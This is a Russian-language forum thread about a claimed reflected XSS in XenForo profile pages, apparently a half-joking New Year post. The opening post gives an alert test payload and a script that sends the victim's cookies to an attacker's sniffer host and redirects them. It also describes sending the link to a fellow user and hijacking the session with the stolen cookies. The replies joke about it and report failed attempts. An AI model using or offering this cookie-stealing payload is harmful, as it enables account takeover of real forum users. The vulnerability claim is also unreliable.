Заметка Уязвимость XenForo - Предновогодний XSS (НЕ шутка!)

SOUL

АдминкА
Администратор
Сообщения
7.086
Симпатии
10.374
Баллы
266
#1
Антоха в поисках XSS-уязвимости обнаружил вот что! Girl_Impossible8 :


Выяснилось странная закономерность-страница профиля тринадцатого мембера любого ксенфоровского форума содержит пассивную xss.В видео для демонстрации был использован простенький скрипт с алертом
Код:
<script>alert('Предновогодний XSS!')</script>
Но это ведь неинтересно и я решил пойти дальше и захватить кресло верховного главнокомандующего.Вместо скрипта выше вставил боевой скрипт который отсылает куки жертвы на мой

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

и редиректит бедолагу на другую страничку,дабы тот не прочухал что-то неладное.
Код:
<script> img  = new Image(); img.src = "http://мой сниффер/s.gif?"+document.cookie;
location.href ="http://какая-нибудь страничка на этом форуме/" </script>
Так как я знал,что X-Shar не ждёт от меня подлости,то не стал заморачиваться с маскировкой,а просто отправил ему линк со скриптом в

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

.
После перехода в админке сниффера можно увидеть следующее (на мне в качестве примера):

xss1.png

Ну и осталось лишь воспользоваться добытыми куками ...

xss2.png

Первоисточник:

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

 

vadimiusstyle

Пользователь
Сообщения
27
Симпатии
1
Баллы
3
#2
Вот вам и предновогодний подарочек.
 

X-Oleg

Местный
Сообщения
588
Симпатии
619
Баллы
93
#3
Теперь всю новогоднюю ночь все хакеры будут искать этого неуловимого 13-го пользователя, гы-гы !:D:eek:
 

grisha2217

Проверенный
Сообщения
83
Симпатии
40
Баллы
18
#6
Шутка? Я уже на своем проекте перепроверил, думал, почему у меня не работает.....
 

OlesyaK2

Проверенный
Сообщения
21
Симпатии
19
Баллы
3
#7
Шутка? Я уже на своем проекте перепроверил, думал, почему у меня не работает.....
Если всем давать готовые инструменты взлома, то явно наступит хаос )))) Если есть обновление, значит нужно его использовать )))
В каждой шутке есть доля шутки ;)
 

grisha2217

Проверенный
Сообщения
83
Симпатии
40
Баллы
18
#8
OlesyaK2, уязвимости дают почти в полной готовности)
Указывают уязвимые версии, код уязвимости, дальше делай с ней, что хочешь
 

pbrovingrek

Пользователь
Сообщения
2
Симпатии
0
Баллы
1
#11
Пробую на версии 1,5 что то не выходит, или я что то не так делал, вроде по видео ставил ето <script>alert('Предновогодний XSS!')</script>
 

SrDEN

Местный
Сообщения
115
Симпатии
109
Баллы
43
#12
Пробую на версии 1,5 что то не выходит, или я что то не так делал, вроде по видео ставил ето <script>alert('Предновогодний XSS!')</script>
Дак всё правильно, новый год то уже прошел, нужно теперь так пробовать:
<script>alert('Предвалентиновый XSS!')</script>
 

Лешшой

Местный
Сообщения
394
Симпатии
210
Баллы
43
#13
Выяснилось странная закономерность-страница профиля тринадцатого мембера любого ксенфоровского форума содержит пассивную xss.В видео для демонстрации был использован простенький скрипт с алертом
В конце 13г админил форум на ксене, эта ексеска была в каждом профиле юзверя. По крайне мере нашего нуленого двигла.
Как правили - не в курсе. Технической частью форума в то время мне не доводилось заморачиваться. Не уж то ли только к 16г до конца все поправили... Punish_man
 
Вверх Снизу